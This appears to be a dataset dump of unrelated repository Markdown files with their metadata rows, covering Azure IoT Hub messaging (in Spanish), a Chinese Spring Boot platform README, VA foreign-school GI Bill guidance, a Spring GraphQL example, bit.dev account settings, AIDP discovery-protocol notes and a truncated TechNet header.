IoT Hub permite la comunicación segura y bidireccional con los dispositivos. Use la mensajería de IoT Hub para comunicar con los dispositivos mediante el envío de mensajes desde los dispositivos a las soluciones back-end y para enviar comandos desde las soluciones back-end de IoT a los dispositivos. Más información acerca del [formato de mensajes de IoT Hub](iot-hub-devguide-messages-construct.md).
## <a name="sending-device-to-cloud-messages-to-iot-hub"></a>Envío de mensajes de dispositivos a la nube para IoT Hub
IoT Hub tiene un punto de conexión de servicio integrado que puede utilizarse en los servicios back-end para leer los mensajes de telemetría de los dispositivos. Este punto de conexión es compatible con [Event Hubs](../event-hubs/index.yml) y el SDK de IoT Hub estándar se puede usar para [leer desde este punto de conexión integrado](iot-hub-devguide-messages-read-builtin.md).
IoT Hub también admite [puntos de conexión personalizados](iot-hub-devguide-endpoints.md#custom-endpoints) que los usuarios pueden definir para enviar eventos y datos de telemetría de dispositivo a los servicios de Azure mediante el [enrutamiento de los mensajes](iot-hub-devguide-messages-d2c.md).
## <a name="sending-cloud-to-device-messages-from-iot-hub"></a>Envío de mensajes de nube a dispositivo desde IoT Hub
Puede enviar mensajes [de nube a dispositivo](iot-hub-devguide-messages-c2d.md) desde la solución de back-end a sus dispositivos.
[!INCLUDE [iot-hub-basic](../../includes/iot-hub-basic-partial.md)]
Las propiedades básicas de la funcionalidad de mensajería de IoT Hub son la confiabilidad y durabilidad de los mensajes. Estas propiedades permiten la resistencia a la conectividad intermitente en el dispositivo y a los picos de carga del procesamiento de eventos en la nube. IoT Hub implementa *al menos una vez* garantías de entrega para la mensajería del dispositivo a la nube y de la nube al dispositivo.
## <a name="choosing-the-right-type-of-iot-hub-messaging"></a>Elección del tipo correcto de mensajería de IoT Hub
Los mensajes de dispositivo a nube se utilizan para enviar telemetría y alertas de series temporales desde la aplicación para dispositivo y los mensajes de nube a dispositivo, para las notificaciones unidireccionales a su aplicación para dispositivo.
* Para elegir entre los mensajes de dispositivo a nube, las propiedades notificadas o la carga de archivos, consulte la [Guía de comunicación de dispositivo a nube](./iot-hub-devguide-d2c-guidance.md).
* Para elegir entre los mensajes de nube a dispositivo, las propiedades deseadas o los métodos directos, consulte la [Guía de comunicación de nube a dispositivo](./iot-hub-devguide-c2d-guidance.md).
## <a name="next-steps"></a>Pasos siguientes
* Información acerca del [enrutamiento de mensajes](iot-hub-devguide-messages-d2c.md) de IoT Hub.
* Obtenga más información acerca de la [mensajería de nube a dispositivo](iot-hub-devguide-messages-c2d.md) de IoT Hub. | 75.9 | 408 | 0.797365 | spa_Latn | 0.979171 |
fa5deae4f1682856400ef974682cc75475d6ec24 | 9,028 | md | Markdown | README.md | guokaia/Mekatok-V3 | a1550fd4fc7beeebdf283c4a88d45ce01ec7996b | [
"MIT"
] | null | null | null | README.md | guokaia/Mekatok-V3 | a1550fd4fc7beeebdf283c4a88d45ce01ec7996b | [
"MIT"
] | 1 | 2022-01-08T12:18:22.000Z | 2022-01-08T12:23:45.000Z | README.md | guokaia/Mekatok-V3 | a1550fd4fc7beeebdf283c4a88d45ce01ec7996b | [
"MIT"
] | null | null | null | <p align="center">
<img src="./document/static/logo.png" />
</p>
<p align="center">
<strong>一个基于SpringBoot实现的敏捷开发平台,一切为了简化与复用.</strong>
<br />
<img src="https://img.shields.io/badge/JDK-11+-green.svg" />
</p>
## 简介
Mekatok是一个基于SpringBoot实现的敏捷开发平台,通过特定的模块划分和打包方式使一套代码同时支持"单体应用"和"微服务"两种交付形式.为了解决以"小项目"为主导的团队在业务沉淀,迭代复用方面的痛点.Mekatok更适用于多"初级开发"的团队,为其树立正确的开发逻辑,业务抽象能力和编码价值观.
Mekatok的出现并不是为了团队快速开始SpringBoot应用的开发,而是在有一定的项目,业务积累的时候高效的复用已有代码.
## 信条
1. 润物无声 - 自做增强不做改变,Mekatok引入的技术栈均不改变原工具使用逻辑,仅在原有基础上做符合现有业务的增强;
2. 志同道合 - 寻找和培养更多拥有相近编码价值观,业务抽象能力和工作效率的小伙伴;
3. 简单集成 - 平台内所有功能只需在maven中引入模块或通过在启动类添加自定义 *@EnableXXXX* 注解即可集成(有些插件还需要再application.yml中配置值);
## 名称由来
Mekatok的名字来源于网络游戏"魔兽世界"中,联盟阵营侏儒领袖--大工匠梅卡托克的缩写.
愿工匠精神鼓舞你我前进!!!
## 最小依赖
1. JDK 11+
2. DataBase
3. Redis
## 架构图
<p align="center">
<img src="./document/static/architecture.jpg" />
</p>
## 项目结构
```
icu.guokai.mekatok
|- app # 前端项目
|- mekatok-ui-vue # 前端模板 - vue3
|- console # 中后台管理
|- document # 平台&项目文档
|- expand # 平台扩展项目
|- mekatok-expand-control # 应用监控台
|- mekatok-expand-sso # 单点登录服务端
|- external # 外部工具
|- Nacos # Nacos服务器
|- Redis # Redis服务器
|- ... # 其他外部依赖
|- foundation # 平台基础功能
|- mekatok-foundation-ou # 组织用户功能集
|- mekatok-foundation-disk # 文件管理功能集
|- mekatok-foundation-dic # 字典功能集
|- framework # 框架基础功能
|- mekatok-framework-core # 框架基础功能
|- mekatok-framework-cache # 框架缓存功能
|- mekatok-framework-tool # 框架工具集
|- mekatok-framework-security # 安全认证功能
|- mekatok-framework-stomp # 简单的消息队列
|- mekatok-framework-plugin # 平台级默认配置
|- mekatok-framework-queue # 框架队列功能
|- mekatok-framework-flowable # 工作流相关功能
|- mekatok-framework-log # 日志相关功能
|- mekatok-framework-netty # Netty 服务组件
|- modules # 模块项目
|- moduleA # 模块A
|- mekatok-moduleA-declare # 模块A - 声明部分
|- mekatok-moduleA-execute # 模块A - 实现部分
|- mekatok-moduleA-starter # 模块A - 启动器部分
|- pom.xml # 模块A - maven setting
|- moduleB # 模块B
|- ... # 模块...
|- .editorconfig # 编辑器格式设置
|- lombok.config # Lombok基础配置文件
|- pom.xml # maven setting
|- README.md # 项目介绍
```
## Mekatok如何帮助我们coding
1. 以单表CRUD为例
1. [以前] 创建Domain和DTO,映射字段 -> 创建Mapper,添加CRUD SQL -> 创建IService和Service,添加CRUD函数 -> 创建Controller,添加CRUD路由映射 -> 测试下,好用
2. [现在] 创建Table对象,映射字段 -> 创建空Mapper接口 -> 创建空Controller类 -> 统一实现,理论无需测试
2. 以使用缓存为例
1. [以前] 打开搜索引擎 -> 搜"springboot 缓存" -> 打开某篇博客 -> 拿到关键字,去项目里找找有没有已经实现的 -> 找到了就复用,没有就自己根据博客内容添加 -> 改改,好用
2. [现在] CacheCenter.get(), CacheCenter.put(), CacheCenter.remove();
3. 以计算MD5为例
1. [以前] 打开搜索引擎 -> 搜“Java MD5加密” -> 打开某篇博客-> 复制粘贴 -> 改改好用
2. [现在] SecureUtil.md5()
4. 以业务复用为例
1. [以前] 找到以前项目的源码 -> 分析源码与现有框架的差异 -> 一个一个类的迁移 -> 创建配置类,配置模块基本设置 -> 修改测试,好用
2. [现在] maven 中直接引入 module-xxx-starter
## 依赖环境
| 依赖组件 | 版本 | 描述 |
| :----------------: | :------: | :-----------------: |
| JDK | 11+ | java开发工具 |
| Spring Boot | 2.4.1 | Spring全家桶 |
| Hutool | 5.6.0 | 静态工具类 |
| Forest | 1.5.11 | 函数式http client |
| MyBatis | 3.5.6 | 持久化工具 |
| MyBatis-Plus | 3.4.3 | 持久化工具扩展 |
| knife4j | 2.0.8 | Swagger UI增强 |
| Swagger | 2.10.5 | 在线接口文档 |
| flowable-spring | 6.6.0 | 工作流引擎 |
| reflections | 0.9.12 | 反射增强工具 |
| JNA | 5.7.0 | java本地接口访问 |
| ganymed-ssh2 | build210 | ssh-2协议的java库 |
| dynamic-datasource | 3.3.2 | 多数据源管理工具 |
| spring-boot-admin | 2.3.1 | spring应用监控 |
| liteflow | 2.6.3 | 流程编排工具 |
## 快速上手
1. 在modules目录下创建你的模块;
2. pom文件中引入 **mekatok-framework-plugin**;
3. 创建application.yml(或properties文件),配置平台依赖参数,如数据库链接和插件配置项等;
4. 创建SpringBootApplication启动类.生成main方法,添加注解@MekatokApplication(无需再添加@SpringBootApplication);
5. 启动main方法;
项目启动后,除正常的启动Springboot应用外.还默认集成并配置了异步任务支持,路由环绕打印,主机序列号校验,客户端IP校验,MVC异常统一处理,http与https双通道监听,Mybatis增强与动态数据源,SpringUtil增强,Swagger与knife4j开启与配置;
## 帮助文档
* [Mekatok平台中ActiveRecord模式使用方法](./document/Mekatok平台中ActiveRecord模式使用方法.md)
* [Mekatok平台中Cache的使用方法](./document/Mekatok平台中Cache的使用方法.md)
* [Mekatok平台中Controller的开发规范](./document/Mekatok平台中Controller的开发规范.md)
* [Mekatok平台中Flowable工作流的使用方法](./document/Mekatok平台中Flowable工作流的使用方法.md)
* [Mekatok平台中IService和Impl的开发规范](./document/Mekatok平台中IService和Impl的开发规范.md)
* [Mekatok平台中JSR107函数级缓存使用方法](./document/Mekatok平台中JSR107函数级缓存使用方法.md)
* [Mekatok平台中Mapper和xml的开发规范](./document/Mekatok平台中Mapper和xml的开发规范.md)
* [Mekatok平台中Redis消息队列的使用方法](./document/Mekatok平台中Redis消息队列的使用方法.md)
* [Mekatok平台中Security的使用与配置方法](./document/Mekatok平台中Security的使用与配置方法.md)
* [Mekatok平台中Swagger接口分组的使用方法](./document/Mekatok平台中Swagger接口分组的使用方法.md)
* [Mekatok平台中WebSocket消息队列使用方法](./document/Mekatok平台中WebSocket消息队列使用方法.md)
* [Mekatok平台中三级Bean抽象的使用方法](./document/Mekatok平台中三级Bean抽象的使用方法.md)
* [Mekatok平台中业务级流式断言的使用](./document/Mekatok平台中业务级流式断言的使用.md)
* [Mekatok平台中主机和客户端校验的实现方式](./document/Mekatok平台中主机和客户端校验的实现方式.md)
* [Mekatok平台中使用Redis作为Dubbo的注册中心的使用方法](./document/Mekatok平台中使用Redis作为Dubbo的注册中心的使用方法.md)
* [Mekatok平台中分页的获取与使用方法](./document/Mekatok平台中分页的获取与使用方法.md)
* [Mekatok平台中单体应用实现方案](./document/Mekatok平台中单体应用实现方案.md)
* [Mekatok平台中同时支持单体和微服务打包](./document/Mekatok平台中同时支持单体和微服务打包.md)
* [Mekatok平台中大屏展示解决方案](./document/Mekatok平台中大屏展示解决方案.md)
* [Mekatok平台中如何实现数据默认缓存实现](./document/Mekatok平台中如何实现数据默认缓存实现.md)
* [Mekatok平台中工具集使用逻辑](./document/Mekatok平台中工具集使用逻辑.md)
* [Mekatok平台中应用健康监控使用方法](./document/Mekatok平台中应用健康监控使用方法.md)
* [Mekatok平台中异步任务调度的使用方法](./document/Mekatok平台中异步任务调度的使用方法.md)
* [Mekatok平台中微服务应用实现方案](./document/Mekatok平台中微服务应用实现方案.md)
* [Mekatok平台中插件的使用方法](./document/Mekatok平台中插件的使用方法.md)
* [Mekatok平台中模块划分的开发规范](./document/Mekatok平台中模块划分的开发规范.md)
* [Mekatok平台中自定义事件的使用方法](./document/Mekatok平台中自定义事件的使用方法.md)
* [Mekatok平台中自定义异常的创建使用与规范](./document/Mekatok平台中自定义异常的创建使用与规范.md)
* [Mekatok平台中部分配置的使用方法](./document/Mekatok平台中部分配置的使用方法.md)
* [Mekatok平台中集合类扩展的使用](./document/Mekatok平台中集合类扩展的使用.md)
## 延伸功能
1. 基于SpringBootAdmin的应用健康监控 -- **expand/mekatok-expand-control** 应用健康服务端,可视化的查看应用健康状况,缓存,Spring BeanFactory, 内存使用,心跳等等;
2. 基于OAuth2授权码模式的统一认证 -- **expand/mekatok-expand-sso** (暂未实现);
3. 基于websocket使用STOMP协议实现的前后端消息队列演示客户端 -- **external/stomp**;
4. 基于Redis实现的缓存中心,通过静态函数的方式暴露缓存的使用.并支持JSR107标准实现函数级缓存 -- **framework/mekatok-framework-cache**;
5. 基于ApplicationEvent的自定义事件,通过静态函数的方式发布事件.支持标准 *@EventListener* 订阅 -- **framework/mekatok-framework-plugin**;
6. 基于Mybatis Plus实现的ActiveRecord模式对象持久化,在项目中既可以自定义写SQL.又在单表操作时支持 *bean.save();* *bean.delete();* *bean.push();* -- **framework/mekatok-framework-core**;
7. 基于缓存中心实现的平台级单表操作均以缓存形式实现,数据表中单行数据的CRUD均以缓存为主; -- **framework/mekatok-framework-core**;
8. 基于RuntImeException延伸的全套自定义异常映射流程管理.包括通过注解为异常编码.异常处理器的统一拦截加工; -- **framework/mekatok-framework-core**;
9. Model, View, Table 三级java bean抽象,满足在不需要时,尽可能少的创建domain和DTO; -- **framework/mekatok-framework-core**;
10. 基于Servlet数据共享实现的分页获取机制,通过静态函数让请求在线程内任何位置获取分页数据; -- **framework/mekatok-framework-core**;
11. 基于ActiveRecord模式对象持久化的支持,平台内可以在controller的接口中实现单表CRUD零代码开发; -- **framework/mekatok-framework-core**;
12. 基于flowable实现的工作流引擎,通过静态函数实现流程的装载,查询,操作; -- **framework/mekatok-framework-flowable**;
13. 基于AsyncTaskExecutor实现的异步任务统一调度; -- **framework/mekatok-framework-plugin**;
14. 基于Spring Security实现的安全查询工具,通过静态函数的方式获取当前认证用户相关信息,对象空安全; -- **framework/mekatok-framework-security**;
15. 基于Docket的Swagger分组显示,只需实现平台内特定Bean返回对应字段值; -- **framework/mekatok-framework-plugin**;
16. 基于Filter实现的客户端IP校验; -- **framework/mekatok-framework-plugin**;
17. 基于ApplicationStartedEvent事件监听实现的主机序列号校验; -- **framework/mekatok-framework-plugin**;
18. 基于Redis实现的消息队列,通过静态函数发布消息,并通过向Spring容器中加入特定接口实现类来订阅频道; -- **framework/mekatok-framework-queue**;
19. 基于Spring Security实现的安全校验与权限认证,通过注解 *@EnableSimpleSecurity* 和 *@OauthSecurityConfiguration* 开启不同的认证方式; -- **framework/mekatok-framework-security**;
20. 基于WebSocket使用STOMP协议实现的自建消息队列,实现浏览器间一对多,一对一或广播的消息通讯; -- **framework/mekatok-framework-stomp**;
21. 基于Redis实现的微服务注册中心;
| 47.020833 | 154 | 0.637904 | yue_Hant | 0.408292 |
fa5f5bdf9accfb97f19231fd9d736ce56c8c71c5 | 5,678 | md | Markdown | va-gov/pages/education/about-gi-bill-benefits/how-to-use-benefits/study-at-foreign-schools.md | jennilynhowell/vets-website | 4edea8aee0c80cdbaa0ff731d5e60dc814ed63b7 | [
"CC0-1.0"
] | null | null | null | va-gov/pages/education/about-gi-bill-benefits/how-to-use-benefits/study-at-foreign-schools.md | jennilynhowell/vets-website | 4edea8aee0c80cdbaa0ff731d5e60dc814ed63b7 | [
"CC0-1.0"
] | null | null | null | va-gov/pages/education/about-gi-bill-benefits/how-to-use-benefits/study-at-foreign-schools.md | jennilynhowell/vets-website | 4edea8aee0c80cdbaa0ff731d5e60dc814ed63b7 | [
"CC0-1.0"
] | 1 | 2018-09-26T12:02:49.000Z | 2018-09-26T12:02:49.000Z | ---
layout: page-breadcrumbs.html
template: detail-page
title: Foreign Programs
plainlanguage: 11-28-16 certified in compliance with the Plain Writing Act
concurrence: incomplete
order: 2
aliases:
- /education/gi-bill/foreign-programs/
---
<div class="va-introtext">
If you plan to study at a foreign school, find out how you can use VA benefits to cover your tuition and fees.
</div>
<div class="feature" markdown=“1”>
### Can I get VA education benefits to study at a foreign school?
You can get education benefits if you qualify for—or already get—VA educational assistance and you meet both of the requirements listed below.
**Both of these must be true:**
- We’ve approved your program, **and**
- Your program is at an institution of higher learning where you’ll earn a standard college degree or something of equal value at that foreign school
### Who’s covered?
- Veterans
- Qualified dependents
**Exception:** Family members who qualify for Survivors’ and Dependents’ Educational Assistance can get VA benefits while in approved postsecondary (after high school) non-college degree programs at training locations in the Philippines.
</div>
### What benefits can I get?
- Money for school
- Money for your housing costs during enrollment
-----
### Is the application process different for foreign schools?
Yes. The application process is different. Here’s what you’ll need to do:
- Contact the school or use the GI Bill Comparison Tool to find out if we’ve approved your program for VA educational benefits. <br>
[Use the GI Bill Comparison Tool](/gi-bill-comparison-tool).
- If you still have questions about the school or program, you can submit a question to us using the GI Bill website. <br>
[Go to the GI Bill website](https://gibill.custhelp.com/app/utils/login_form/redirect/ask).
- Then, give us the name of the foreign school, the complete address, and the name of the program you want to enroll in. We’ll let you know if your program has already been approved.
If you or your qualified dependent want to enroll in a program that we haven’t approved, you’ll need to ask the school to request approval. We can’t take any action until an official from your school (not you) requests approval. If we don’t approve your program, you’ll have to pay all costs at the school, including tuition and fees.
### Can I attend any foreign school?
- We’ll accept degrees from schools in foreign countries that are similar to degrees granted by U.S. colleges and universities that are accredited (meaning approved and recognized according to certain standards).
- For private schools overseas, the degree must be of equal value to those granted by public colleges and universities in the same country, and the school must have the same entrance requirements.
- Independent study courses must be accredited by a nationally recognized accrediting association.
Use the GI Bill Comparison Tool to see what benefits you can get at the school you want to attend.
<br>
<a class="usa-button-primary va-button-secondary" href="/gi-bill-comparison-tool">Use the GI Bill Comparison Tool</a>
**Exception:** Programs at schools located in the United States that offer courses in a foreign country through the Department of Defense don’t qualify as foreign training. Also, year abroad and similar programs offered by schools in the United States don’t qualify as foreign training.
### How do I get these benefits?
<ol class="process">
<li class="process-step list-one">
After we approve the school, you’ll need to apply. <br>
[Apply for benefits](/education/how-to-apply/).
Turn in your application to us at least 90 days before you leave for your new school. We’ll decide what benefits you get based on your school’s location.
If you get approved for benefits, turn in your Certificate of Eligibility (COE) to the school’s certifying official to show that you qualify for VA benefits. Your school’s certifying official will submit your enrollment information with a VA Enrollment Certification (VA Form 22-1999). Please note that you won’t get payments until we’ve received and processed your enrollment information.
</li>
<li class="process-step list-two">
Be sure you have enough money to cover all your needs until VA payments begin. And make arrangements with the school for acceptance, enrollment, payment of tuition and fees, and housing.
</li>
<li class="process-step list-three">
Make sure you give written permission for school officials to release necessary information to us. If you don’t, it could affect when you get benefits.
Normally, foreign schools certify their students for 1 academic year. Within 120 days of your enrollment, you should let the school know if you plan to re-enroll and ask the certifying official to submit an enrollment certification for you. Make sure the school knows your plans for continued enrollment to avoid any delay in getting your benefits.
</li>
</li>
</ol>
### Need help?
Get more information or help with your application:
- If you’re in the United States, call 1-888-GI-BILL-1 (<a href="tel:+18884424551">1-888-442-4551</a>), Monday through Friday, 8:00 a.m. to 7:00 p.m. (<abbr title="eastern time">ET</abbr>). Or, go to a VA regional benefit office near you. <br>
[Find a regional benefit office](/facilities).
- If you’re outside the United States, call <a href="tel:+0019187815678">001-918-781-5678</a>, Monday through Friday, 8:00 a.m. to 7:00 p.m. (<abbr title="eastern time">ET</abbr>)
- Get help from local representatives of Veterans organizations and the American Red Cross
- Go to a foreign service post
- Contact the Canadian Department of Veterans Affairs (Canadian schools only)
| 52.574074 | 389 | 0.771574 | eng_Latn | 0.999103 |
fa60265e9ecb855820ceff62d58144d565eea65e | 895 | md | Markdown | spring-example/README.md | dugenkui03/federation-jvm | aa702b0deff90ab967c189672250ee33a0f02660 | [
"MIT"
] | 158 | 2019-05-31T20:05:36.000Z | 2022-03-30T01:53:27.000Z | spring-example/README.md | dugenkui03/federation-jvm | aa702b0deff90ab967c189672250ee33a0f02660 | [
"MIT"
] | 96 | 2019-06-13T20:18:11.000Z | 2022-03-31T15:47:44.000Z | spring-example/README.md | dugenkui03/federation-jvm | aa702b0deff90ab967c189672250ee33a0f02660 | [
"MIT"
] | 70 | 2019-06-13T20:22:44.000Z | 2022-03-10T04:16:19.000Z | This Spring Boot application contains examples for both a microservice using standard `graphql-java` and a microservice using `graphql-java-tools`; their code is separated under different subpackages and Spring profiles.
To run the standard `graphql-java` example, `cd` to the root of this project, then...
```
## compile and install project including example and dependencies
mvn install
## start local webserver on 9000
mvn -pl spring-example spring-boot:run
```
To run the `graphql-java-tools` example, for the last step instead run:
```
mvn -pl spring-example spring-boot:run -Dspring-boot.run.profiles=graphql-java-tools
```
Now you can query your local graph:
```
## e.g.
curl -X POST -H "Content-Type: application/json" --data '{"query":"{__schema{types{name}}}"}' "http://localhost:9000/graphql"
```
You can also query your local graph with GraphiQL at http://localhost:9000/graphiql . | 47.105263 | 220 | 0.75419 | eng_Latn | 0.975551 |
fa60bf077af33592f996e8ba15472215d749ebcc | 1,953 | md | Markdown | docs/bit-dot-dev/my-account.md | Tom-Sloan/docs | 1590150ab6fc1263fcd08ad97066240c72606987 | [
"MIT"
] | 40 | 2017-10-19T15:34:59.000Z | 2021-12-22T02:09:04.000Z | docs/bit-dot-dev/my-account.md | Tom-Sloan/docs | 1590150ab6fc1263fcd08ad97066240c72606987 | [
"MIT"
] | 91 | 2017-10-29T09:50:13.000Z | 2022-03-30T05:29:39.000Z | docs/bit-dot-dev/my-account.md | Tom-Sloan/docs | 1590150ab6fc1263fcd08ad97066240c72606987 | [
"MIT"
] | 102 | 2017-10-19T10:21:04.000Z | 2022-03-10T09:06:07.000Z | ---
id: my-account
title: Account Features
---
## User settings
To view the profile page, log-in and click on your avatar in the top right corner. Then click on the profile name and select the settings page where you can:
- Change the avatar
- Update password
- Add and update email addresses
- Delete organizations
- Leave organizations
- Delete your account
## Organization settings
To view an organization, select the organization from the avatar's drop-down list, and click the settings button near the top-right of the page. An organization's admin can:
- Click on the edit button to change the organization's image, name, homepage, or description.
- Click on the Settings button to edit the organization's members, billing settings, and integrations.
## Scope management
Change the settings of a scope by clicking the settings button above the side-bar on the scope page. You can access the scope page via the url: `bit.dev/<owner>/<scope>`. To make modifications to the scope you need to have admin privileges on the scope.
### Scope settings
On the scope page you can edit the scope's description, or access the settings page to:
- Change the scope's visibility (public / private).
- Change the scope's description.
- Delete the scope from bit.dev.
- Manage the users that can access the scope and change their permissions.
### Users and Roles
Use the permission tab of the scope to add, remove, and change permissions for users for the scope.
A scope's members are assigned with 3 possible roles:
| Role | Admin | Developer | Viewer |
|---|---|---|---|
| View Components* | Yes | Yes | Yes |
| Import Components* | Yes | Yes | Yes |
| Install Components* | Yes| Yes | Yes |
| Export Components | Yes| Yes | No |
| Manage members | Yes | No | No |
| Edit scope's information | Yes | No | No |
| Define integrations | Yes | No | No |
> *Viewing, importing and installing is available for all users for public scopes.
| 36.849057 | 255 | 0.732207 | eng_Latn | 0.993428 |
fa617a92c0bf1733525c854b0f0af9aaf06020b2 | 2,082 | md | Markdown | AvoCommLib/research/aidp.md | ananace/avoview | 5943f8382111d9ed3412e035b56e0c3f3523f4b7 | [
"MIT"
] | 6 | 2020-04-05T12:13:15.000Z | 2022-01-27T18:31:05.000Z | AvoCommLib/research/aidp.md | ananace/avoview | 5943f8382111d9ed3412e035b56e0c3f3523f4b7 | [
"MIT"
] | null | null | null | AvoCommLib/research/aidp.md | ananace/avoview | 5943f8382111d9ed3412e035b56e0c3f3523f4b7 | [
"MIT"
] | 2 | 2021-07-14T22:33:03.000Z | 2021-12-22T23:06:32.000Z | AIDP protocol
=============
UDP, port 3211, max 8192B, up to 3 retries, read timeout 4-40s default 10s
Header:
-------
uint8_t - `0x01` - SOH
uint32_t - `"AIDP"` - Signature
uint16_t - Sequence ID - Incrementing with every request
uint8_t - Command ID - `0`-`127` Request, + 128 for Reply
uint32_t - Length
DATA
uint8_t - `13` - EoF?
Enums:
------
**Error status**:
Ok = 0
TooBig = 1
NoSuchName = 2
BadValue = 3
ReadOnly = 4
Generic = 5
InvalidRequest = 6
ApplianceError = 7
IPInUse = 8
Timeout = 4096
BadReply = 4097
IOError = 4098
**Model type**:
HP_3x1x16 = 8
Dell_2161DS = 12
BlackBox_KV121A_E = 15
Commands:
---------
### 1 - Discover Request
if extended {
uint8_t - `1` - Protocol?
uint16_t - `2`
uint8_t - `1`
uint8_t - `8`
if network prefix {
uint8_t - `2` - Network Prefix
uint16_t - `16`
uint8_t[N] - Network prefix
uint8_t - `3` - Network Prefix Length
uint16_t - `1`
uint8_t - Network prefix length
}
}
uint8_t - `255`
### 2 - Test IP
### 129 - Discover Response
while(!eof) {
uint8_t - Field ID
uint16_t - Length
ID 1:
uint16_t - Model ID
ID 2:
uint8_t[6] - MAC address
ID 3:
uint8_t[4 || 16] - IP Address
ID 4:
uint8_t[4] - Subnet address
ID 5:
uint8_t[4] - Gatewy address
ID 6:
uint8_t[N] - Hostname
ID 7:
uint8_t - Supported modes
0x01 - Static IPv4
0x02 - Dynamic IPv4
0x04 - Static IPv6
0x08 - Dynamic IPv6
ID 255: EOF
}
### 16 - SNMP Get
### 17 - SNMP Get Next
foreach (varbind) {
uint8_t - `1`
uint16_t - varbind.length
uint8_t[] - varbind.data
}
### 144 - SNMP Get Response
### 145 - SNMP Get Next Response
while(!eof) {
uint8_t - Field ID
uint16_t - Length
ID 1:
uint16_t - `0`-`5` - Error status
ID 2:
uint16_t - Error index
ID 3:
uint8_t[Length] - VarBind Data
VarBind data layout:
uint8_t - `6` - SNMP ASN type ID for OID
uint8_t - OID int count
int32_t[N] - OID
uint8_t - Value ID (SNMP ASN type ID)
uint16_t - Value length
uint8_t[N] - Value data
ID 255: EOF
}
| 15.086957 | 74 | 0.613833 | kor_Hang | 0.436724 |
fa61f2dd6c2eecdb9853cc46b1e251b9fb351b7e | 466 | md | Markdown | documentation/api/DefaultEcs-Entity-Remove-T-().md | smolen89/DefaultEcs | 35d844a4530ad6e4d7a01538cdc63811a13ad05e | [
"MIT"
] | null | null | null | documentation/api/DefaultEcs-Entity-Remove-T-().md | smolen89/DefaultEcs | 35d844a4530ad6e4d7a01538cdc63811a13ad05e | [
"MIT"
] | null | null | null | documentation/api/DefaultEcs-Entity-Remove-T-().md | smolen89/DefaultEcs | 35d844a4530ad6e4d7a01538cdc63811a13ad05e | [
"MIT"
] | null | null | null | #### [DefaultEcs](./DefaultEcs.md 'DefaultEcs')
### [DefaultEcs](./DefaultEcs.md#DefaultEcs 'DefaultEcs').[Entity](./DefaultEcs-Entity.md 'DefaultEcs.Entity')
## Remove<T>() `method`
Removes the component of type [T](#DefaultEcs-Entity-Remove-T-()-T 'DefaultEcs.Entity.Remove<T>().T') on the current [Entity](./DefaultEcs-Entity.md 'DefaultEcs.Entity').
### Type parameters
<a name='DefaultEcs-Entity-Remove-T-()-T'></a>
`T`
The type of the component.
| 42.363636 | 176 | 0.701717 | yue_Hant | 0.789635 |
fa62255c81f01a6eb197c762b5d5059dd749e476 | 325 | md | Markdown | HISTORY.md | data-dev/MetaData.json | 22e2811f250401a40277178575c3ab60cfe13f86 | [
"MIT"
] | 4 | 2020-05-22T19:22:08.000Z | 2022-01-22T02:35:49.000Z | HISTORY.md | data-dev/MetaData.json | 22e2811f250401a40277178575c3ab60cfe13f86 | [
"MIT"
] | 17 | 2020-05-21T14:29:43.000Z | 2020-06-08T19:46:30.000Z | HISTORY.md | data-dev/MetaData.json | 22e2811f250401a40277178575c3ab60cfe13f86 | [
"MIT"
] | 1 | 2021-09-06T07:49:22.000Z | 2021-09-06T07:49:22.000Z | # History
## 0.0.1 (2020-06-08)
* Populate data subtype in MySQL connector - [Issue #11](https://github.com/data-dev/MetaData/issues/11) by @k15z
* Modifying the schema to support non-unique table names - [Issue #13](https://github.com/data-dev/MetaData/issues/13) by @k15z
## 0.0.1 (2020-05-22)
* First release on PyPI.
| 29.545455 | 127 | 0.701538 | eng_Latn | 0.510797 |
fa634257f10df0fb1c427bd11aa454ff9d809621 | 1,174 | md | Markdown | README.md | doodspav/coc-api-image | e24c2fa0f318aa3409c4f208526a71dbdad5cfef | [
"MIT"
] | 3 | 2020-01-14T20:28:44.000Z | 2021-08-08T05:09:55.000Z | README.md | doodspav/coc-api-image | e24c2fa0f318aa3409c4f208526a71dbdad5cfef | [
"MIT"
] | 3 | 2017-12-12T09:34:57.000Z | 2021-01-20T03:08:52.000Z | README.md | doodspav/coc-api-image | e24c2fa0f318aa3409c4f208526a71dbdad5cfef | [
"MIT"
] | 1 | 2017-12-12T21:22:05.000Z | 2017-12-12T21:22:05.000Z | # coc-api-image
This repo lets you generate a image of someone's main base profile in clash of clans using their #.
Uses the clash of clans api - get an api key at https://developer.clashofclans.com/
Tutorial
------
Use python 2.7 (and I'm 99% sure it works in python 3.x)
Using git:
$ git clone http://github.com/doodspav/coc-api-image
Python packages:
$ pip install numpy
$ pip install pillow
$ pip install fonttools
You will need to get an api key from https://developer.clashofclans.com/.
Bear in mind that api keys are IP specific.
Use the api_key as show in the example (usage denoted by api_key).
Use the example.py file to create an image in the same folder that everything else is in. The image will be called test.jpg.
$ python example.py
If you are using this on a bot, please credit me in your bot's message that display's all its commands.
Errors
------
An invalid api key will generate a _404_ error.
An invalid #player_tag will return a _403_ error.
For any other error, start an issue.
Author
------
doodspav
LINE ID - doodspav
COC - #ULP92C2
Credits
------
Akkey Kami (LINE ID - akkey_god): helped with font issues
| 22.150943 | 124 | 0.723169 | eng_Latn | 0.982061 |
fa63aa49485c6586deacce3c73c4ed99b5a89122 | 1,886 | md | Markdown | dynamicsax2012-technet/returnlocationprintparameter-class-microsoft-dynamics-commerce-runtime-transactionservice-serialization.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/returnlocationprintparameter-class-microsoft-dynamics-commerce-runtime-transactionservice-serialization.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/returnlocationprintparameter-class-microsoft-dynamics-commerce-runtime-transactionservice-serialization.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: ReturnLocationPrintParameter Class (Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization)
TOCTitle: ReturnLocationPrintParameter Class
ms:assetid: T:Microsoft.Dynamics.Commerce.Runtime.TransactionService.Serialization.ReturnLocationPrintParameter
ms:mtpsurl: https://technet.microsoft.com/en-us/library/microsoft.dynamics.commerce.runtime.transactionservice.serialization.returnlocationprintparameter(v=AX.60)
ms:contentKeyID: 65322605
ms.date: 05/18/2015
mtps_version: v=AX.60
f1_keywords:
